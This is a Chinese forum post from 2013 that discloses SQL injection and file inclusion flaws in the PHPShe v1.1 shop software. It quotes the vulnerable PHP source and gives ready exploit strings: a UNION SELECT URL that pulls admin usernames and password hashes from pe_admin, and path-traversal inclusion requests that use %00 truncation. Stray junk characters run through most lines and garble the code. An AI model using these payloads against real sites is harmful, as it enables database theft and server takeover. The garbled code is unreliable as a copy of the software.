找回密码
 立即注册
查看: 3154|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/5 u  I4 F0 b3 L$ f, z* ~
/* Phpshe v1.1 Vulnerability2 X! G+ D9 l, ~$ _
/* ========================
3 v* R! ], ?7 d8 B2 G2 n/* By: : Kn1f3
5 w1 Q2 w9 [# r/* E-Mail : 681796@qq.com
% U  \! ~- m2 s/*******************************************************/
, e" N5 b8 I. ]* |0×00 整体大概参数传输
2 P" |2 @* b& M5 O2 i* O+ l+ g
% f  `( v6 P8 ^- j* L
1 q$ x$ ]5 e( {5 Q4 y

. L$ {! q5 \( r//common.php
- |! M$ }  \3 o: I+ i% Y" `if (get_magic_quotes_gpc()) {% @* K8 f# O# \
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');* \- F! Z0 W1 C% D1 m1 o: c
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');, g; g; w* `  c4 e. O2 N& u8 R/ H
}. n. Z( ?0 G+ }8 v5 {. c, }7 n
else {+ x; w' c+ ~" ^9 ^" N- n+ {# T
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');+ c: j' @) I$ B+ f3 l$ U# E2 _
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
2 K3 P# y/ z% Q, p+ ?9 s* N! a}. P  x* f% h) ^
session_start();
6 I' Q% r- ]+ b$ [( B2 K!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');% _& ^' L! M$ f" ?2 [- u! h9 Z6 J
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');0 s0 |! ~" E" d: `. _) ?+ G
1 X- g0 h; a7 h1 O% D- r1 [
0×01 包含漏洞
& P6 b  ?, _5 N  X! Y3 K! `7 S
: d( @6 r& @4 T

% ]% G/ X# E7 |( ^' Z& v9 k//首页文件
* ?0 \3 t" x, t<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
# o6 U# p* }4 f3 }1 Ninclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
, I% J) K8 p: m) W2 vpe_result();
! r) V$ v9 s# P! w) C?>6 Q  K9 [2 D% X  k! b' l% D
//common 文件 第15行开始/ L% t6 _+ h8 r2 |
url路由配置
" k) d, |  w8 u: A$module = $mod = $act = 'index';: B7 v+ ^# S& X. [0 V) f
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
' c7 ^; n, r4 X" r9 j( L, F' J$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
) ^! O& r- ?) K2 ]2 X: g$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
3 ~- C# n2 S# f* i2 L//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
0 }7 w8 M0 h9 \0 f8 ?' u: S


; ^  c3 a) C+ M
; H- c) F9 _/ \! [ 0×02 搜索注入8 M, c+ E. \8 X

8 v" c* y- ]% S+ S/ R<code id="code2">

//product.php文件
' B* h  v! Z& m8 I5 |case 'list':% {! Q; ?& h& A0 d. k5 I
$category_id = intval($id);8 `; r; z1 ?* D2 K8 N
$info = $db->pe_select('category', array('category_id'=>$category_id));
: v, K) o- |0 _' `4 j7 X& p9 S//搜索
. w+ J2 X$ K; ^( F- C- C& m8 {$sqlwhere = " and `product_state` = 1";) k; \  r+ h" o0 n/ {& G% P' S, w
pe_lead('hook/category.hook.php');
5 C- e& g" D4 J* Z4 ~7 {4 u2 ^6 Gif ($category_id) {% C, A4 u2 ]! J; `7 g4 X
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";' B+ _+ f3 r* R, r# N, b0 j) c
}* W1 q. P4 Q8 b0 \& R" S: I0 M6 P* M
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
* u1 j1 G3 O$ t. s& ~  Pif ($_g_orderby) {' f3 t1 D6 s: T. ?
$orderby = explode('_', $_g_orderby);/ T4 b: @/ c+ c! U
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";, f' y- r2 p% A
}! \/ J" ]7 r/ ^! r  f' Z  `5 K
else {+ N3 o  l# n/ t! z5 t1 g
$sqlwhere .= " order by `product_id` desc";6 v& N0 k( V; d; N
}$ c6 [8 V% e. ^+ H
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));0 X% t3 a3 ^8 U+ M
//热卖排行9 O& Q1 \8 }. b) W
$product_hotlist = product_hotlist();
( w2 |, s. d1 z: {4 u//当前路径
# B& I! l4 [$ U$ X- h  k$nowpath = category_path($category_id);4 Z% S, _4 q6 Q' w8 [# \; v
$seo = pe_seo($info['category_name']);
! \7 W7 }9 `$ ?( K. Sinclude(pe_tpl('product_list.html'));
; q  v* |  o$ l0 l2 B, W//跟进selectall函数库
) z3 l; [3 G, g1 Zpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())6 U6 s1 Q2 F! T  {
{) Q7 v9 b5 C0 m  i
//处理条件语句
& u0 b% J' Q" o9 X/ r/ I( D$sqlwhere = $this->_dowhere($where);: [# H6 Z" D. l% `
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
+ e' s2 M) D% M% Q/ d4 N1 n3 M  k}% u. D8 |0 a- u+ r1 {
//exp
# ?1 C7 o1 w8 ^6 d( C# Aproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='10 X6 e% F& u! j0 C

</code>
: L6 M, A4 A2 i6 \% I' b0 \ 6 d  X6 J' ^( s) x  v
0×03 包含漏洞2
* K4 k7 y/ Q9 C8 t. o! M
8 V- M$ u+ w% p+ {% T% @<code id="code3">

//order.php

case 'pay':

. L# K2 Z0 E" X; {. Z9 `* h. l0 |
$order_id = pe_dbhold($_g_id);

7 o. Q& D) W! T, a- }$ J5 v
$cache_payway = cache::get('payway');


# q3 L0 Q- A$ j. o& P6 |foreach($cache_payway as $k => $v) {

' |4 L3 Y8 M! B! F" I
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

" U& g+ ~+ x" m: k! G9 R* F5 n
if ($k == 'bank') {

0 X4 f7 Y& v( V4 U! o, c
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


( h; a7 h4 n; [! B+ K) M' l}

( E" }4 E1 K' p' m# o" ~! i
}


, |  i7 @* g7 o, S9 c$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

: X% z9 T! ?3 r* D
!$order['order_id'] && pe_error('订单号错误...');

; i; A* \* O1 ~8 A- t, l' ?
if (isset($_p_pesubmit)) {


% S% e  H9 W# m* ~if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


! h. w6 r+ q5 M$ Y9 b$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

* P: O' w* e2 Y' ?4 T* V
foreach ($info_list as $v) {


  D1 I9 c+ D' W* E$order['order_name'] .= "{$v['product_name']};";
/ ~) h; p5 M5 p

! G: y% O% A$ y- z7 F, x
}

5 j& s8 D6 |) i, }
echo '正在为您连接支付网站,请稍后...';


  K! w: D+ Z8 n, {: A' Minclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

) q- E! d1 v: b8 W+ q) ]5 }
}//当一切准备好的时候就可以进行"鸡肋包含了"

* Y) R6 U2 }. z' Q/ ?, d8 z& j! N
else {

; L5 c! N  r9 h2 m
pe_error('支付错误...');


. |! B* k( U& O0 A5 D( N}

, n: c- m6 \$ H. A" f: |- f) V
}


& p$ F+ }7 Z( D/ p8 O$seo = pe_seo('选择支付方式');


- G8 x( c) G. H; C! h: Ninclude(pe_tpl('order_pay.html'));

; R4 K8 e1 q  Z# B! F' M: t8 `0 k6 c
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>5 e- h% `# C4 m5 P# _2 h( v; e; _9 ~

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表